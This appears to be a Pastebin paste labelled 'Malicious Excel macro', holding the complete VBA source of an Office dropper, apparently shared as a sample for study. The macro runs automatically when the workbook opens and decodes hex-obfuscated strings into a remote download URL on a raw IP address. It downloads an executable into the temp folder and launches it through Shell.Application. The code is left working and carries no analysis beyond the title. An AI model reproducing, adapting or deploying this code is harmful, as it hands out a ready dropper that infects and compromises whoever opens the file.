Advertisement
dynamoo

Malicious Excel macro

Dec 17th, 2014
604
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "Ёта нига"
  2. Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = False
  8. Attribute VB_Customizable = True
  9. Public Function rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta(ByVal gtretret As String) As String
  10.   Dim i       As Long
  11.   For i = 1 To Len(gtretret) Step 2
  12.  
  13. Dim MexzDXUy As Integer
  14. MexzDXUy = 3
  15. Do While MexzDXUy < 81
  16. DoEvents: MexzDXUy = MexzDXUy + 1
  17. Loop
  18.  
  19.   rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  20.   Next i
  21.  End Function
  22.  
  23. Sub Auto_Open()
  24. NGHDLXMAJBA
  25. End Sub
  26. Sub AutoOpen()
  27.     Auto_Open
  28. End Sub
  29. Sub Workbook_Open()
  30.     Auto_Open
  31. End Sub
  32. Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
  33.      Dim EYQNARIIOVP As Object, GUTUPYZSTWJ As Long, LJDEHVYKBYP As Long, VCAJTUXQHLA() As Byte
  34.  
  35.     Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  36.     EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
  37.     EYQNARIIOVP.Send "sdfggdgdfg"
  38.  
  39.  
  40.     VCAJTUXQHLA = EYQNARIIOVP.responseBody
  41.  
  42.     LJDEHVYKBYP = FreeFile
  43.  
  44.     Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
  45.     Put #LJDEHVYKBYP, , VCAJTUXQHLA
  46.     Close #LJDEHVYKBYP
  47.    
  48. Set GBIviviu67FUGBK = CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))
  49. GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
  50. End Function
  51. Sub NGHDLXMAJBA()
  52. fdgBBBB = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("687474703A2F2F33382E39362E3137352E3133393A383038302F737461742F6C6C64762E706870")
  53.     IQQKFERUGKJ fdgBBBB, Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
  54. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement